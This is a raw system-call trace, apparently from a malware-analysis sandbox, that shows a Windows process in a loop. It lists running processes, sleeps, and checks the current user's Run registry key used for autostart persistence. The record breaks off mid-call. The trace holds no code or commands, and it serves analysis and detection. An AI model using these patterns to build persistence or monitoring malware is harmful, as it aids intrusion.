[0175.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.902] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.903] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.904] NtClose (Handle=0x274) returned 0x0 [0175.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.917] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.920] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.920] NtClose (Handle=0x274) returned 0x0 [0175.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.935] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.936] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.936] NtClose (Handle=0x274) returned 0x0 [0175.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.949] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.951] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.951] NtClose (Handle=0x274) returned 0x0 [0175.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.964] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.965] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.965] NtClose (Handle=0x274) returned 0x0 [0175.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.979] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.981] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.981] NtClose (Handle=0x274) returned 0x0 [0175.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.995] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.996] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.996] NtClose (Handle=0x274) returned 0x0 [0175.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.009] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.011] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.011] NtClose (Handle=0x274) returned 0x0 [0176.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.029] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.031] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.031] NtClose (Handle=0x274) returned 0x0 [0176.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.041] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.042] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.042] NtClose (Handle=0x274) returned 0x0 [0176.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.051] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.052] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.052] NtClose (Handle=0x274) returned 0x0 [0176.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.062] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.063] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.063] NtClose (Handle=0x274) returned 0x0 [0176.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.079] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.080] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.080] NtClose (Handle=0x274) returned 0x0 [0176.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.092] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 